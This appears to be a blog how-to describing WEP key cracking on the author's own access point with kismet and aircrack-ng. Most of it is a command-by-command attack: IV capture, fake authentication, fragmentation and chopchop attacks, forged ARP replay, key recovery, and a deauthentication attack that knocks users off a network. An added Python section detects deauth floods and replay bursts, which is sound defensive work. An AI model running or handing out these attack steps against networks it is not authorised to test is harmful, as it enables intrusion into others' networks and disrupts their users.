I have cracked WEP from my own AP. I found it amazing how easily it can be done.
So DO NOT TRUST just WEP. Using kismet and aircrack-ng I was able to crack it in less than 20 min.
p.s. For those lamers that still use Windows I suggest using this top of the line Live CD called BackTrack http://www.remote-exploit.org/backtrack_download.html
Other ways are out there to crack it. I would also recommend a less manual method using the Live-CD called Wifiway, download, or just use the one below plus the script called airoway, download
#apt-get install kismet
Start Kismet; you will need to know your wifi driver:
#lshw -C network
#dmesg| grep ipw
#dmesg| grep wl
To find more info on your driver:
#sudo lsmod | grep iwl4965
#kismet -c rt2500,rausb0,wifi
#kismet -c iwl4965,wlan0,Wifi
(if it doesn't work)
The problem with these drivers and kismet is that you can't put your card in "monitor mode" from kismet, so set it by hand:
#iwconfig wlan0 mode monitor
Once you have the GUI, type "h" for help, or "s" then "p" to sort by packet count;
now scroll and hit "i" for more info on the one you wish. Take note of Channel, BSSID and SSID,
then Shift-L to lock onto the channel you want and follow the instructions below.
Save your configuration:
#gedit /etc/kismet/kismet.conf and enter it in line 27:
Install the aircrack-ng tools:
#apt-get install aircrack-ng
Dump IVs: --ivs -w <prefix> will write only IV traffic to the capture file; pass channel and BSSID as args.
#airodump-ng rausb0 --ivs -w WLAN_1A -a --channel 06 --bssid 00:01:38:6D:2E:26
Open another terminal and start authenticating.
1- Authenticating with the AP; this will SPEED UP generating IVs
# aireplay-ng -1 5 -o 1 -q 10 -e "WLAN_1A" -a 00:01:38:6D:2E:26 -h 00:12:17:88:50:A9 rausb0
2- Getting a XOR packet to replay
A- Fragmentation attack
# aireplay-ng -5 -b 00:01:38:6D:2E:26 -h 00:12:17:88:50:A9 rausb0
B- chopchop attack
# aireplay-ng -4 -b 00:19:5B:9C:68:FA -h 00:12:17:88:50:A9 rausb0
This generates .xor and .cap files.
3- Create an ARP request packet
# packetforge-ng -0 -a 00:01:38:6D:2E:26 -h 00:12:17:88:50:a9 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0821-224752.xor -w arp-request
Once authentication is OK and you have the packet, in another terminal do:
4- Replay ARP traffic (note the IVs increase!)
# aireplay-ng -2 -x 45 -r arp-request rausb0
Once you get about 20,000 (in the #DATA column) you can start trying, but usually with around 40-60k it should crack it.
5- Cracking WEP while dumping
# aircrack-ng -f 2 -b 00:C0:A8:B4:97:ED -n 64 capA-03.ivs
# aircrack-ng -z -b 00:01:38:87:E8:79 D*.cap
Deauth attack: you can deauthenticate people from the AP (airodump should be running at the same time)
# aireplay-ng --deauth 1 -a 00:16:38:C4:9F:AD -c 01:80:C2:00:00:00 rausb0
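The fake-auth, ARP-replay and deauth steps above all leave a visible footprint on the air, which is what a wireless IDS watches for. As an added example (not part of the original post), here is a small Python check over a constructed list of frame records (timestamp, kind, source MAC, length, WEP IV) that flags a deauth flood, a burst of identical-length data frames from one station, and one WEP IV re-sent many times; the record layout and the thresholds are assumptions, and the station MAC is the one used in the post's commands.

```python
from collections import Counter, defaultdict

# Constructed sample capture for this example. Each record is
# (timestamp_seconds, kind, source_mac, length_bytes, wep_iv_or_None).
def constructed_capture():
    frames = []
    # background traffic: two stations, varied sizes, a fresh IV per frame
    for i in range(40):
        frames.append((i * 0.5, "data", "00:aa:aa:aa:aa:01", 100 + (i * 37) % 900, 1000 + i))
        frames.append((i * 0.5 + 0.1, "data", "00:aa:aa:aa:aa:02", 64 + (i * 53) % 1200, 5000 + i))
    # replay burst: one station re-sends the same 68-byte frame, same IV, 300 times in 1 s
    for i in range(300):
        frames.append((20 + i / 300, "data", "00:12:17:88:50:a9", 68, 0x0102AB))
    # deauth flood: management frames carry no WEP IV
    for i in range(30):
        frames.append((25 + i / 30, "deauth", "00:12:17:88:50:a9", 26, None))
    return frames

def detect(frames, deauth_per_sec=10, repeats_per_sec=100):
    """Return sorted (second, source_mac, reason) alerts. Thresholds are assumptions."""
    deauth = Counter()                  # (second, src) -> deauth frames
    sizes = defaultdict(Counter)        # (second, src) -> frame length -> count
    ivs = defaultdict(Counter)          # (second, src) -> WEP IV -> count
    for ts, kind, src, length, iv in frames:
        key = (int(ts), src)
        if kind == "deauth":
            deauth[key] += 1
        elif kind == "data":
            sizes[key][length] += 1
            if iv is not None:
                ivs[key][iv] += 1
    alerts = set()
    for key, n in deauth.items():
        if n >= deauth_per_sec:
            alerts.add(key + ("deauth flood",))
    for key, c in sizes.items():
        if max(c.values()) >= repeats_per_sec:
            alerts.add(key + ("same-length data burst (ARP replay pattern)",))
    for key, c in ivs.items():
        if max(c.values()) >= repeats_per_sec:
            alerts.add(key + ("WEP IV repeated (replayed frame)",))
    return sorted(alerts)

if __name__ == "__main__":
    for second, src, reason in detect(constructed_capture()):
        print(f"t={second}s {src}: {reason}")
```

The two normal stations never trip a threshold, so every alert points at the replaying station; a real sensor would read these fields from monitor-mode captures rather than a constructed list.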
Tags: aircrack-ng, hack wep, kismet, security, wep crack
Posted in HowTo, Linux